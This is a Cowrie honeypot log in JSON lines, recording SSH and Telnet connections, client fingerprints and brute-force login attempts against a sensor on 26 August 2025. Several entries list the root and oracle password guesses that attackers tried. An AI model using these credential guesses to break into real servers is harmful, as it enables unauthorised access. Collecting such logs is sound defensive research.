{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:23:26.643110Z","src_ip":"14.103.129.89","session":"5849d6805e03"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:23:31.151832Z","src_ip":"14.103.129.89","session":"84c0671b7544"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:23:31.586233Z","src_ip":"14.103.129.89","session":"0c61a9631571"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:23:44.023491Z","src_ip":"14.103.129.89","session":"f20c3b21a390"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37115,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc93ae34e896","protocol":"ssh","message":"New connection: 212.227.235.229:37115 (1.2.3.4:22) [session: fc93ae34e896]","sensor":"my-vps","timestamp":"2025-08-26T10:23:47.390846Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T10:23:47.392265Z","src_ip":"212.227.235.229","session":"fc93ae34e896"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T10:23:47.519646Z","src_ip":"212.227.235.229","session":"fc93ae34e896"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T10:23:48.074344Z","src_ip":"212.227.235.229","session":"fc93ae34e896"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:23:49.205464Z","src_ip":"212.227.235.229","session":"fc93ae34e896"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":36474,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8fc82befd04","protocol":"ssh","message":"New connection: 45.88.8.215:36474 (1.2.3.4:22) [session: e8fc82befd04]","sensor":"my-vps","timestamp":"2025-08-26T10:23:57.770797Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:23:58.180310Z","src_ip":"45.88.8.215","session":"e8fc82befd04"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T10:23:58.180962Z","src_ip":"45.88.8.215","session":"e8fc82befd04"}
{"eventid":"cowrie.login.success","username":"root","password":"Mahatru@123","message":"login attempt [root/Mahatru@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:23:59.691179Z","src_ip":"45.88.8.215","session":"e8fc82befd04"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:23:59.936145Z","src_ip":"45.88.8.215","session":"e8fc82befd04"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":60108,"dst_ip":"1.2.3.4","dst_port":22,"session":"9bf2b7ce0afe","protocol":"ssh","message":"New connection: 196.251.86.249:60108 (1.2.3.4:22) [session: 9bf2b7ce0afe]","sensor":"my-vps","timestamp":"2025-08-26T10:24:20.362509Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:24:20.866088Z","src_ip":"196.251.86.249","session":"9bf2b7ce0afe"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:24:20.866751Z","src_ip":"196.251.86.249","session":"9bf2b7ce0afe"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"pass123","message":"login attempt [oracle/pass123] failed","sensor":"my-vps","timestamp":"2025-08-26T10:24:22.843243Z","src_ip":"196.251.86.249","session":"9bf2b7ce0afe"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:24:24.437918Z","src_ip":"196.251.86.249","session":"9bf2b7ce0afe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36522,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff6934a1ab15","protocol":"ssh","message":"New connection: 212.227.125.160:36522 (1.2.3.4:22) [session: ff6934a1ab15]","sensor":"my-vps","timestamp":"2025-08-26T10:24:27.699032Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:24:27.751265Z","src_ip":"212.227.125.160","session":"ff6934a1ab15"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":46654,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc77c8dd05b3","protocol":"ssh","message":"New connection: 45.88.8.186:46654 (1.2.3.4:22) [session: fc77c8dd05b3]","sensor":"my-vps","timestamp":"2025-08-26T10:24:34.205464Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:24:34.732832Z","src_ip":"45.88.8.186","session":"fc77c8dd05b3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T10:24:34.733544Z","src_ip":"45.88.8.186","session":"fc77c8dd05b3"}
{"eventid":"cowrie.login.success","username":"root","password":"12357111317","message":"login attempt [root/12357111317] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:24:36.658144Z","src_ip":"45.88.8.186","session":"fc77c8dd05b3"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:24:37.332526Z","src_ip":"45.88.8.186","session":"fc77c8dd05b3"}
{"eventid":"cowrie.session.connect","src_ip":"153.164.66.228","src_port":46768,"dst_ip":"1.2.3.4","dst_port":23,"session":"b558ef29adf2","protocol":"telnet","message":"New connection: 153.164.66.228:46768 (1.2.3.4:23) [session: b558ef29adf2]","sensor":"my-vps","timestamp":"2025-08-26T10:24:46.746710Z"}
{"eventid":"cowrie.session.closed","duration":12.786638021469116,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:24:59.532333Z","src_ip":"153.164.66.228","session":"b558ef29adf2"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.189","src_port":36150,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea008399c3ad","protocol":"ssh","message":"New connection: 93.123.109.189:36150 (1.2.3.4:22) [session: ea008399c3ad]","sensor":"my-vps","timestamp":"2025-08-26T10:25:21.462841Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:25:21.463826Z","src_ip":"93.123.109.189","session":"ea008399c3ad"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T10:25:21.483219Z","src_ip":"93.123.109.189","session":"ea008399c3ad"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":32906,"dst_ip":"1.2.3.4","dst_port":22,"session":"55bdcbe7db0f","protocol":"ssh","message":"New connection: 196.251.86.249:32906 (1.2.3.4:22) [session: 55bdcbe7db0f]","sensor":"my-vps","timestamp":"2025-08-26T10:25:21.520271Z"}
{"eventid":"cowrie.login.failed","username":"validator","password":"validator","message":"login attempt [validator/validator] failed","sensor":"my-vps","timestamp":"2025-08-26T10:25:21.542933Z","src_ip":"93.123.109.189","session":"ea008399c3ad"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:25:22.186791Z","src_ip":"196.251.86.249","session":"55bdcbe7db0f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:25:22.187539Z","src_ip":"196.251.86.249","session":"55bdcbe7db0f"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:25:22.565663Z","src_ip":"93.123.109.189","session":"ea008399c3ad"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"pass1234","message":"login attempt [oracle/pass1234] failed","sensor":"my-vps","timestamp":"2025-08-26T10:25:25.012397Z","src_ip":"196.251.86.249","session":"55bdcbe7db0f"}
{"eventid":"cowrie.session.closed","duration":"5.2","message":"Connection lost after 5.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:25:26.717396Z","src_ip":"196.251.86.249","session":"55bdcbe7db0f"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":33786,"dst_ip":"1.2.3.4","dst_port":22,"session":"4132909d1c37","protocol":"ssh","message":"New connection: 196.251.86.249:33786 (1.2.3.4:22) [session: 4132909d1c37]","sensor":"my-vps","timestamp":"2025-08-26T10:26:23.818284Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:26:24.446593Z","src_ip":"196.251.86.249","session":"4132909d1c37"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:26:24.448207Z","src_ip":"196.251.86.249","session":"4132909d1c37"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"wasd","message":"login attempt [oracle/wasd] failed","sensor":"my-vps","timestamp":"2025-08-26T10:26:27.610741Z","src_ip":"196.251.86.249","session":"4132909d1c37"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:26:29.158687Z","src_ip":"196.251.86.249","session":"4132909d1c37"}
{"eventid":"cowrie.session.closed","duration":"324.4","message":"Connection lost after 324.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:27:03.435110Z","src_ip":"14.103.129.89","session":"8af43f7f561c"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":34678,"dst_ip":"1.2.3.4","dst_port":22,"session":"374b1d9c1020","protocol":"ssh","message":"New connection: 196.251.86.249:34678 (1.2.3.4:22) [session: 374b1d9c1020]","sensor":"my-vps","timestamp":"2025-08-26T10:27:26.166644Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:27:26.853570Z","src_ip":"196.251.86.249","session":"374b1d9c1020"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:27:26.855021Z","src_ip":"196.251.86.249","session":"374b1d9c1020"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"qwerty","message":"login attempt [oracle/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-26T10:27:29.304418Z","src_ip":"196.251.86.249","session":"374b1d9c1020"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:27:31.033546Z","src_ip":"196.251.86.249","session":"374b1d9c1020"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56488,"dst_ip":"1.2.3.4","dst_port":22,"session":"2984d00433d7","protocol":"ssh","message":"New connection: 217.72.205.35:56488 (1.2.3.4:22) [session: 2984d00433d7]","sensor":"my-vps","timestamp":"2025-08-26T10:28:12.874698Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:12.875977Z","src_ip":"217.72.205.35","session":"2984d00433d7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46128,"dst_ip":"1.2.3.4","dst_port":22,"session":"c05f88368eba","protocol":"ssh","message":"New connection: 212.227.125.160:46128 (1.2.3.4:22) [session: c05f88368eba]","sensor":"my-vps","timestamp":"2025-08-26T10:28:20.613849Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-08-26T10:28:20.614655Z","src_ip":"212.227.125.160","session":"c05f88368eba"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:20.615901Z","src_ip":"212.227.125.160","session":"c05f88368eba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46138,"dst_ip":"1.2.3.4","dst_port":22,"session":"cdcc3ca6ff95","protocol":"ssh","message":"New connection: 212.227.125.160:46138 (1.2.3.4:22) [session: cdcc3ca6ff95]","sensor":"my-vps","timestamp":"2025-08-26T10:28:20.659814Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:20.660795Z","src_ip":"212.227.125.160","session":"cdcc3ca6ff95"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:20.686919Z","src_ip":"212.227.125.160","session":"cdcc3ca6ff95"}
{"eventid":"cowrie.login.success","username":"root","password":"blueberry","message":"login attempt [root/blueberry] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:20.787353Z","src_ip":"212.227.125.160","session":"cdcc3ca6ff95"}
